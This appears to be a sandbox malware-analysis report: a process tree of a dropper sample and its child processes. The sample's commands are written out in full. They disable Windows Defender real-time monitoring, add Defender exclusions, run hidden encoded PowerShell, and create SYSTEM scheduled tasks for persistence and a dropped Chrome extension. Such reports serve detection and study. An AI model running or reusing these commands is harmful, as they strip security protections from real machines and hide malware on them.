1672 cmd.exe 37 PID 1672 wrote to memory of 2544 1672 cmd.exe 37 PID 1672 wrote to memory of 2544 1672 cmd.exe 37 PID 2660 wrote to memory of 2608 2660 cmd.exe 38 PID 2660 wrote to memory of 2608 2660 cmd.exe 38 PID 2660 wrote to memory of 2608 2660 cmd.exe 38 PID 2660 wrote to memory of 2608 2660 cmd.exe 38 PID 2660 wrote to memory of 2608 2660 cmd.exe 38 PID 2660 wrote to memory of 2608 2660 cmd.exe 38 PID 2660 wrote to memory of 2608 2660 cmd.exe 38 PID 1672 wrote to memory of 2496 1672 cmd.exe 40 PID 1672 wrote to memory of 2496 1672 cmd.exe 40 PID 1672 wrote to memory of 2496 1672 cmd.exe 40 PID 1672 wrote to memory of 2496 1672 cmd.exe 40 PID 1672 wrote to memory of 2496 1672 cmd.exe 40 PID 1672 wrote to memory of 2496 1672 cmd.exe 40 PID 1672 wrote to memory of 2496 1672 cmd.exe 40 PID 2660 wrote to memory of 2492 2660 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe"C:\Users\Admin\AppData\Local\Temp\992cc3e016d77ca48aa3c41231c003f1e1aae10ebd770fd519f6af1133c2674b.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Users\Admin\AppData\Local\Temp\7zS8C58.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\7zS8EA9.tmp\Install.exe.\Install.exe /iEsqfdidqlc "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2544
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2496
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2608
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2492
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJoIACHiS" /SC once /ST 00:17:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJoIACHiS"4⤵PID:2772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJoIACHiS"4⤵PID:2408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bioYAMjDPNiNoqxvcS" /SC once /ST 01:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy\SofgVcoVSWNQWUG\BBaOJSp.exe\" 0l /Qxsite_idyXa 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1036
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3CAC0E30-ACF2-465A-9159-2FB00EBA77F5} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]1⤵PID:1652
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:532 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1340
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3040
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2232
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1708
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1604
-
C:\Windows\system32\taskeng.exetaskeng.exe {670E3FA2-2A02-4E47-8435-DE0F7E5A4F4E} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy\SofgVcoVSWNQWUG\BBaOJSp.exeC:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy\SofgVcoVSWNQWUG\BBaOJSp.exe 0l /Qxsite_idyXa 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbahsjRBU" /SC once /ST 00:49:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbahsjRBU"3⤵PID:1500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbahsjRBU"3⤵PID:2300
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2296
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1108
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1796
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvhjHRDQJ" /SC once /ST 00:49:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvhjHRDQJ"3⤵PID:2324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvhjHRDQJ"3⤵PID:2352
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:323⤵PID:2440
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:643⤵PID:2956
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:323⤵PID:2924
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:324⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:643⤵PID:1404
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:644⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\eogxozCJrYNgvSKM\OKrGRObD\PAunZNBAvuUPCbCK.wsf"3⤵PID:2888
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\eogxozCJrYNgvSKM\OKrGRObD\PAunZNBAvuUPCbCK.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2604 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IUaOUdhiTQgU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IUaOUdhiTQgU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TNrIrJXzU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TNrIrJXzU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UbaivrmHqZUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UbaivrmHqZUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VgjyoxcUurXmC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VgjyoxcUurXmC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JiflobLJSPStBDVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JiflobLJSPStBDVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IUaOUdhiTQgU2" /t REG_DWORD /d 0 /reg:324⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IUaOUdhiTQgU2" /t REG_DWORD /d 0 /reg:644⤵PID:2860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TNrIrJXzU" /t REG_DWORD /d 0 /reg:644⤵PID:1028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TNrIrJXzU" /t REG_DWORD /d 0 /reg:324⤵PID:1600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UbaivrmHqZUn" /t REG_DWORD /d 0 /reg:324⤵PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UbaivrmHqZUn" /t REG_DWORD /d 0 /reg:644⤵PID:528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VgjyoxcUurXmC" /t REG_DWORD /d 0 /reg:324⤵PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VgjyoxcUurXmC" /t REG_DWORD /d 0 /reg:644⤵PID:2996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR" /t REG_DWORD /d 0 /reg:324⤵PID:2592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR" /t REG_DWORD /d 0 /reg:644⤵PID:2444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JiflobLJSPStBDVB" /t REG_DWORD /d 0 /reg:324⤵PID:3064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JiflobLJSPStBDVB" /t REG_DWORD /d 0 /reg:644⤵PID:3012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy" /t REG_DWORD /d 0 /reg:324⤵PID:1796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wAuKxhFMAdiQGsoHy" /t REG_DWORD /d 0 /reg:644⤵PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:324⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eogxozCJrYNgvSKM" /t REG_DWORD /d 0 /reg:644⤵PID:1596
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGPhKAAcI" /SC once /ST 00:09:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGPhKAAcI"3⤵PID:2676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGPhKAAcI"3⤵PID:2208
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2256
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1552
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2076
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YjdyicABEfUJyYqxF" /SC once /ST 00:51:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\eogxozCJrYNgvSKM\yqBNUoJESotNheK\jLiBrzq.exe\" I7 /fcsite_idLJR 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YjdyicABEfUJyYqxF"3⤵PID:2928
-
-
-
C:\Windows\Temp\eogxozCJrYNgvSKM\yqBNUoJESotNheK\jLiBrzq.exeC:\Windows\Temp\eogxozCJrYNgvSKM\yqBNUoJESotNheK\jLiBrzq.exe I7 /fcsite_idLJR 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2420 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bioYAMjDPNiNoqxvcS"3⤵PID:2508
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1672
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2664
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2260
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TNrIrJXzU\KAgDUp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RkwdBuXRacmpEbY" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RkwdBuXRacmpEbY2" /F /xml "C:\Program Files (x86)\TNrIrJXzU\pvyqgvL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RkwdBuXRacmpEbY"3⤵PID:288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RkwdBuXRacmpEbY"3⤵PID:1612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ulMIPatxpFafmD" /F /xml "C:\Program Files (x86)\IUaOUdhiTQgU2\SeszmCT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kuMWFrkDPqCqj2" /F /xml "C:\ProgramData\JiflobLJSPStBDVB\NXJrHMZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:920
-
-
